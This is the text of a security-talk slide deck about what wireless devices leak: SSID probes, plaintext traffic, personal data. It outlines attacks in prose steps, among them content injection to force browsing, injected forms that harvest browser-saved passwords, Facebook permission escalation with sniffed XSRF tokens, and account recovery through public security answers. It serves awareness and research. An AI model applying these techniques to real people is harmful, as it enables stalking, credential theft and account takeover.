So let me show you what you are unknowningly disclosing to the world...
personal information is the key to exploiting blind trust
your information disclosures weaken the security of the organizations that you are associated with
What do your network probes say about you?
Or where you've been?
IT MEANS YOU CAN BE TRACKED!
(This is true especially when the network names are unique)
Your wireless device stores the network name (SSID) of access points you have connected to in the past
and is ALWAYS trying to reconnect (conveniently) for you automatically.
And interestingly enough:
it also means that personality traits & characteristics can potentially be identified
- attwifi
- hhonors
- gogoinflight
- cafe on 8th
- OperaHouseLobby
- IBM-Corp
- IBM-Conference
- Chuck-E-Cheese
- linksys
- dlink
- HPSETUP
- Allie's Macbook
- Steven's Macbook
- Hooters
- FugSportsBarAndGrill
- Buffalo Wild Wings
- attwifi
- tmobile
- Hey apt317 - Shut your dog up!
Low Severity leads to High Severity
Convenience Is An Attack Vector
But noboby seems to care ...
CONVENIENCE IS WINNING
In the battle between convenience and security
unless it's their own personal information that's being disclosed.
Analysis of Information Disclosures
Confessions of Your Stalker
Confessions of Your Identity Thief
802.11 Ways to Annoy You
Alternate Presentation Titles
M A R K W U E R G L E R
Security Researcher / Penetration Tester / SILICA Developer
for Immunity Inc.
YOU ARE DISCLOSING WHERE YOU HAVE BEEN
What do we know about you so far?
01) MAC Address
02) What you connect to
03) Current GPS location
04) Preferred Network Names / Locations
05) Data
Time It Takes To Access Your Plaintext Data
Your photo's metadata can also disclose GPS data.
You tell us what networks you have privileged access to
(since you can't hide a data frame)
The MAC address of the wireless access point also offers us
a point in space that can be plotted on a map for geographical tracking.
So what else can we get?
06) Name
07) Address
08) Age
09) Passwords
10) Phone Number
11) Family
12) Friends
13) Pizza Preference
14) Browsing Habits
15) Emails
16) Text Messages
17) ...
18) ...
Attack Scenario: Find the corporate wireless device that is also ARPing for the local Starbucks. It's an attacker's path of least resistance to gain unauthorized access to company resources.
Now that we have access to plaintext data
we can start looking for more personal information disclosures ...
was the result of a research project to determine if I could shape identities and personalities of those in control of data transmitting devices. Everything that is "interesting" is stored in a database.
STALKER
PCAP -> PEOPLE = PEOPLECAP!
Do you know what you are leaking?
Things to Consider
Sites often use SSL to protect password transmission but don't protect
the authenticated session or the data that is in it.
XSRF tokens DON'T WORK if everyone gets to peek at them ...
If data is not encrypted it's vulnerable to man-within-range-of-you
attacks (with wireless you don't have to be in the middle of anything ;)
Sites that disclose personal data are interesting but sites that
offer an API to your personal data are even more interesting.
- and your passwords, chats, sms messages, downloaded files, etc, etc, etc ...
AGGRESSIVE ENUMERATION
OF PERSONAL DATA
FORCED BROWSING
Using content injection to manipulate the content rendered in a target's browser for the purpose of exploitation, personal data enumeration or forced marketing.
FORCED MARKETING
Using forced browsing to generate like's, +1's, votes, clicks as well as to inject custom web content and ads into an active web session.
Forcing you to disclose your personal information
DEMO
FORCED BROWSING
Using content injection to
control the browser
2
An attacker sees the client’s request and
generates a modified response.
The modified response will make everything appear normal to the client, but includes hidden code to initiate the forced browsing.
2a
1
A wireless client makes a request
to an unencrypted website.
3
The attacker sends the forged response to the client before the real response arrives.
4
The client computer sees cnn.com as expected, but executes the attacker's hidden code and is secretly directed to information-disclosing websites.
DEMO
CONTENT INJECTION
1
Client either visits a website or is forced to visit a website whose password is stored by the browser.
Form injection to retrieve stored passwords
2
An attacker injects a form to mimic what is auto-populated by the browser
Convenience is an attack vector
Ever use these?
3
The code is executed, and sends the browser-populated data to the attacker
Little by Little:
building a profile against you one site at a time.
What can I find out about you when all you are doing is listening to Pandora?
DEMO
CONTENT INJECTION
Turning a trusted Facebook application into a trojan
1. An attacker forces a logged-in user to browse to a facebook application's permission dialog (non-SSL)
2. The attacker collects XSRF tokens from the permission dialog's HTML
3. The attacker generates a POST request with all possible application permissions and forces the (re-)installation of the application by simulating the "Allow" click.
By escalating permissions and grabbing your access key:
THE ATTACKER HAS FULL, ANYTIME ACCESS TO ALL
YOUR FACEBOOK DATA INCLUDING YOUR:
INBOX, CHATS, EMAIL, PHONE, ADDRESS, FAMILY, FRIENDS, STATUSES, PHOTOS, WALL POSTS, LOCATIONS, RELATIONSHIPS, EMPLOYMENT DATA, & EVERYTHING ELSE FACEBOOK HAS TO OFFER.
THE ATTACKER CAN EVEN SEND YOU SMS MESSAGES OR POST TO YOUR WALL AS YOU.
BEFORE the attack there were only a few default permissions set for this trusted app.
AFTER the attack,
all of the available
permissions are set.
LIVE DEMO
CONTENT INJECTION
Install a Facebook trojan/backdoor
Fermat's Last Theorem
Using data or access we have in order to get
the data or access we want.
Scenario: Your gmail account is over SSL but your backup email that you have registered (for password recovery) is under our control.
[it's in the clear so it's under everyone's control, really].
Some sites forget that 3rd party sites that they interact with are a part of the security model. You're only as strong as your weakest link, etc.
Answers to popular security questions ...
Pet's name?
Mother's maiden name?
Favorite book/movie?
Birthday?
Birthplace?
Teacher's name?
Phone numbers?
Childhood friend?
Hero/rolemodel?
что за это самое - вот эта штука - что это такое?!
Answers to these questions are all over the websites you visit, especially social networking sites.
Even though the email and phone number are obfuscated we have enough information (in STALKER) to piece together which email account the recovery process will use.
!
Conclusion #1
1) your information disclosures weaken the security of the organizations that you are associated
with TODO :
2)